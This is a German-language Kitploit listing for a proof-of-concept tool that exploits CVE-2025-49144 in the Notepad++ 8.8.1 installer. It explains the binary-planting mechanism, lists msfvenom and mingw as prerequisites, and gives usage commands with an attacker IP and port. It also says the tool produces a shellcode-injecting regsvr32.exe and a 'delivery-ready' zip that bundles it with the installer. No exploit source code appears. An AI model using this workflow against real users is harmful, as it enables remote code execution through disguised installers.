Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Notepad-8.8.1_CVE-2025-49144 — Proof of Concept (PoC), das die CVE-2025-49144-Sicherheitslücke im Notepad++ 8.8.1-Installer ausnutzt. | Kitploit
Tools/GitHubGitHub/b0ysie7e/notepad-8.8.1_cve-2025-49144
Payload-GenerierungExploitationShellcodePenetrationstestsLernen & BildungBinary-Exploitation
GitHubb0ysie7e/notepad-8.8.1_cve-2025-49144

Notepad-8.8.1_CVE-2025-49144

Proof of Concept (PoC), das die CVE-2025-49144-Sicherheitslücke im Notepad++ 8.8.1-Installer ausnutzt.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
61vor 1 JahrNoch nicht geprüft

CVE-2025-49144 – Exploit für Notepad++ 8.8.1

Dieses Repository enthält einen funktionsfähigen Proof of Concept (PoC), der die CVE-2025-49144-Sicherheitslücke im Notepad++ 8.8.1-Installationsprogramm ausnutzt. Die schädliche Ausführung erfolgt, indem eine Binärdatei (regsvr32.exe) in dasselbe Verzeichnis wie das angreifbare Installationsprogramm gelegt wird. Wenn das Installationsprogramm ausgeführt wird, erbt es den Kontext und löst die Nutzlast aus.

⚠️ Haftungsausschluss
Dieser Code ist ausschließlich für Bildungs- und Forschungszwecke bestimmt. Die unbefugte Nutzung auf Systemen ohne ausdrückliche Genehmigung kann einen Gesetzesverstoß darstellen.
Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder böswillige Aktivitäten im Zusammenhang mit diesem Werkzeug.


🧪 Voraussetzungen

  • Python 3.x
  • msfvenom (Teil des Metasploit Frameworks)
  • mingw-w64 (x86_64-w64-mingw32-gcc)
  • Angreifbares Installationsprogramm: npp.8.8.1.Installer.x64.exe (muss manuell in dasselbe Verzeichnis gelegt werden)

⚙️ Verwendung

root@kitploit:~
python3 exploit.py -i <LHOST> -p <LPORT>

Beispiel:

root@kitploit:~
python3 exploit.py -i 192.168.100.10 -p 4444

Dies wird die folgenden Dateien erzeugen:

  • regsvr32.exe: Ausführbare Datei, die Shellcode in einen entfernten notepad.exe-Prozess injiziert.
  • notepad_payload.zip: auslieferungsfertiges Archiv, das Folgendes enthält:
    • npp.8.8.1.Installer.x64.exe
    • regsvr32.exe

🎬 Demo

[Demo-Vorschau]

Tool herunterladen